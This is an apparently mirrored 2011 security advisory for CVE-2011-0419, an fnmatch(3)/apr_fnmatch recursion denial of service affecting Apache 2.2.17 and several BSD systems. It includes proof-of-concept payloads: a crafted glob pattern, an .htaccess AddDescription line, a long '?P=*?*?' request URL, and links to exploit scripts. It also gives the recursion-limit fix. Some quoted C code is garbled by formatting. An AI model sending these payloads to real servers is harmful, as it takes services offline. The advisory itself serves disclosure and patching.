Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:26373
HistoryMay 16, 2011 - 12:00 a.m.

Multiple Vendors libc/fnmatch(3) DoS (incl apache poc)

2011-05-1600:00:00
vulners.com
50

[ Multiple Vendors libc/fnmatch(3) DoS (incl apache poc) ]

Author: Maksymilian Arciemowicz
http://netbsd.org/donations/
http://securityreason.com/
http://cxib.net/

Date:

  • Dis.: 29.01.2011
  • Pub.: 13.05.2011

CVE: CVE-2011-0419
CWE: CWE-399

Affected Software (verified):

  • Apache 2.2.17
  • NetBSD 5.1
  • OpenBSD 4.8
  • FreeBSD
  • MacOSX 10.6
  • SunSolaris 10

Original URL:
http://securityreason.com/achievement_securityalert/98

β€” 0.Description β€”
fnmatch – match filename or pathname using shell glob rules

SYNOPSIS
#include <fnmatch.h>

 int
 fnmatch&#40;const char *pattern, const char *string, int flags&#41;;

β€” 1. Multiple Vendors libc/fnmatch(3) DoS (incl apache poc) β€”
Attacker, what may modify first and second parameters(pattern,string) of fnmatch(3), may cause
to CPU resource exhaustion. To see problem huge complexity, try compile code below:

fnmatch("???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????*","xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx",0);

fnmatch should return quickly answer, logically int.

-fnmatch()/netbsd/fnmatch.c–
/* Collapse multiple stars. /
while (c == '
')
c = FOLDCASE(*++pattern, flags);
-fnmatch()/netbsd/fnmatch.c–

fnmatch() skip multiple stars here. It protect us before patterns like
"********************…", but not before "??????????*?..".
Let's see what will happen if we use single star in pattern:

-fnmatch()/netbsd/fnmatch.c–
case '':
c = FOLDCASE(pattern, flags);
/
Collapse multiple stars. /
while (c == '
')
c = FOLDCASE(
++pattern, flags);

                    if &#40;*string == &#39;.&#39; &amp;&amp; &#40;flags &amp; FNM_PERIOD&#41; &amp;&amp;
                        &#40;string == stringstart ||
                        &#40;&#40;flags &amp; FNM_PATHNAME&#41; &amp;&amp; *&#40;string - 1&#41; == &#39;/&#39;&#41;&#41;&#41;
                            return &#40;FNM_NOMATCH&#41;;

.

                    /* General case, use recursion. */
                    while &#40;&#40;test = FOLDCASE&#40;*string, flags&#41;&#41; != EOS&#41; {
                            if &#40;!fnmatch&#40;pattern, string, &lt;====================== RECURSION
                                         flags &amp; ~FNM_PERIOD&#41;&#41;
                                    return &#40;0&#41;;
                            if &#40;test == &#39;/&#39; &amp;&amp; flags &amp; FNM_PATHNAME&#41;
                                    break;
                            ++string;
                    }
                    return &#40;FNM_NOMATCH&#41;;

-fnmatch()/netbsd/fnmatch.c–

Recursion in this code:
if (!fnmatch(pattern, string, <=== RECURSION WITHOUT LIMITS

may cause to denial of service. Some recursion limit is missing here.
Fix has been created together with NetBSD and should work on all BSD's implementations of
fnmatch(3). To fix it, limit recursion_level to 64, because it guaranty quickly result. e.g.

-fixβ€”
.
static int
fnmatchx(const char *pattern, const char *string, int flags, size_t recursion) <=== ADD (
size_t recursion )
{
const char *stringstart;
char c, test;

    _DIAGASSERT&#40;pattern != NULL&#41;;
    _DIAGASSERT&#40;string != NULL&#41;;

    if &#40;recursion-- == 0&#41; &lt;=== DECREMENT recursion_level
            return FNM_NORES;

.
int
fnmatch(const char *pattern, const char *string, int flags)
{
return fnmatchx(pattern, string, flags, 64); <=== SET recursion_level HERE
}
.
-fixβ€”

This fix limit max recursion level to 64. Any bigger value, may be unsafe

To demonstrate this flaws, i'm using apache with mod_autoindex because it's best vector here.
There are two ways to denial of service, local and remote.

IMPORTANT:
fnmatch(const char *pattern, const char *string, int flags);

strlen(string) should be smaller as strlen(pattern)

let's start

-apache.2.2.17;apr_fnmatch();srclib/apr/strings/apr_fnmatch.cβ€”
.
/* Collapse multiple stars. /
while (c == '
') {
c = *++pattern;
}
.

        /* General case, use recursion. */
        while &#40;&#40;test = *string&#41; != EOS&#41; {
            if &#40;!apr_fnmatch&#40;pattern, string, flags &amp; ~APR_FNM_PERIOD&#41;&#41; { &lt;=== RECURSION
                return &#40;APR_SUCCESS&#41;;

.
-apache.2.2.17;apr_fnmatch();srclib/apr/strings/apr_fnmatch.cβ€”

This is BSD implementation of fnmatch(3). So the same issue exist in NetBSD, OpenBSD etc. Now
we need find some code, where apr_fnmtach() is used.

-apache.2.2.17;mod_autoindex.cβ€”
.
/*
* Make the comparison using the cheapest method; only do
* wildcard checking if we must.
*/
if (tuple->wildcards) {
found = (apr_fnmatch(tuple->pattern, filename, MATCH_FLAGS) == 0); <=== LOCAL DOS
}
.
if (pattern && (apr_fnmatch(pattern, dirent->name, <=== REMOTE DOS
APR_FNM_NOESCAPE | APR_FNM_PERIOD
#ifdef CASE_BLIND_FILESYSTEM
| APR_FNM_CASE_BLIND
#endif
)
!= APR_SUCCESS)) {
return (NULL);
}
.
-apache.2.2.17;mod_autoindex.cβ€”

As we can see, in mod_autoindex are two apr_fnmatch() cals.

    found = &#40;apr_fnmatch&#40;tuple-&gt;pattern, filename, MATCH_FLAGS&#41; == 0&#41;; &lt;=== LOCAL DOS

and

    if &#40;pattern &amp;&amp; &#40;apr_fnmatch&#40;pattern, dirent-&gt;name, &lt;=== REMOTE DOS

To use the first, we need create some file with long filename e.g.

"xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"

then create .htaccess with 'AddDescription'

AddDescription "fnmatch DoS"
??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????*

Result:
www-data 1816 2.2 0.3 419048 9844 ? R 18:39 5:39 /usr/sbin/apache2 -k start

The second possibility to remote denial of service, come when attacked servers contain
directory with long filename.

http://localhost/?P=*?*?...to.4096

where variable 'P', will be used in {{{apr_fnmatch(pattern, dirent->name,}}} as a pattern.

If the filename is to short, of course we can set long pattern e.g. 4096 chars.

http://localhost/?P=*?*?*?*?*?…??*…to.4096

Apache 2.2.18 fix this problem.

To local attack, use this script written in php and execute it in writable directory.

http://cxib.net/stuff/apache.fnmatch.phps

127# httpd -v && uname -a
Server version: Apache/2.2.17 (Unix)
Server built: Dec 28 2010 13:21:44
NetBSD localhost 5.1 NetBSD 5.1 (GENERIC) #0: Sun Nov 7 14:39:56 UTC 2010
[email protected]:/home/builds/ab/netbsd-5-1-RELEASE/i386/201011061943Z-obj/home/builds/ab/netbsd-5-1-RELEASE/src/sys/arch/i386/compile/GENERIC
i386
127# ls -la
total 8
drwxrwxrwx 2 root wheel 512 Feb 8 21:41 .
drwxr-xr-x 7 www wheel 1024 Jan 31 08:49 …
-rw-r–r-- 1 www wheel 1056 Feb 8 19:39 .htaccess
-rw-r–r-- 1 www wheel 0 Feb 8 19:39
cx…
-rw-r–r-- 1 www wheel 1240 Feb 8 19:42 run.php
127# ps -aux -p 617
USER PID %CPU %MEM VSZ RSS TTY STAT STARTED TIME COMMAND
www 617 98.6 0.4 10028 4004 ? R 7:38PM 121:43.17 /usr/pkg/sbin/httpd -k start

Time = 121:43 and counting

In result, we get:

.
www 2044 0.0 0.4 10028 3932 ? R 9:49PM 0:20.23 /usr/pkg/sbin/httpd -k start
www 2047 0.0 0.4 10028 3932 ? R 9:49PM 0:19.29 /usr/pkg/sbin/httpd -k start
www 2051 0.0 0.4 10028 3924 ? R 9:50PM 0:19.86 /usr/pkg/sbin/httpd -k start
www 2086 0.2 0.4 10028 3936 ? R 9:49PM 0:19.62 /usr/pkg/sbin/httpd -k start
www 2088 0.0 0.4 10028 3936 ? R 9:49PM 0:19.76 /usr/pkg/sbin/httpd -k start
www 2206 0.0 0.4 10028 3948 ? R 9:50PM 0:20.92 /usr/pkg/sbin/httpd -k start
www 2225 0.0 0.4 10028 3944 ? R 9:50PM 0:20.63 /usr/pkg/sbin/httpd -k start
www 2233 0.3 0.4 10028 3948 ? R 9:49PM 0:19.95 /usr/pkg/sbin/httpd -k start
www 2278 0.0 0.4 10028 3924 ? R 9:50PM 0:18.63 /usr/pkg/sbin/httpd -k start
www 2316 0.0 0.4 10028 3924 ? R 9:50PM 0:19.76 /usr/pkg/sbin/httpd -k start
www 2317 0.0 0.4 10028 3924 ? R 9:50PM 0:19.85 /usr/pkg/sbin/httpd -k start
.

cx@cx64:~$ telnet 172.11.12.129 80
Trying 172.11.12.129…
telnet: Unable to connect to remote host: Connection timed out
cx@cx64:~$

β€” 2. Exploit β€”
http://cxib.net/stuff/apr_fnmatch.txt

β€” 3. Fix β€”
Fix has been created together with netbsd team and should fix this problem in all BSD's
implementation of fnmatch(3).

http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gen/fnmatch.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gen/fnmatch.c?annotate=1.15
http://netbsd.org/donations/

β€” 4. References β€”
https://rhn.redhat.com/errata/RHSA-2011-0507.html
http://httpd.apache.org/security/vulnerabilities_22.html
http://www.apache.org/dist/apr/CHANGES-APR-1.4

http://cwe.mitre.org/data/definitions/399.html

A similar vulnerability based on CWE-399
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-0762
http://securityreason.com/achievement_securityalert/95

β€” 5. Greets β€”
Christos Zoulas, sp3x, Infospec

β€” 6. Contact β€”
Author: Maksymilian Arciemowicz [ SecurityReason.com ]

Email:

  • cxib {a\./t] securityreason [d=t} com

GPG:

http://netbsd.org/donations/
http://securityreason.com/
http://cxib.net/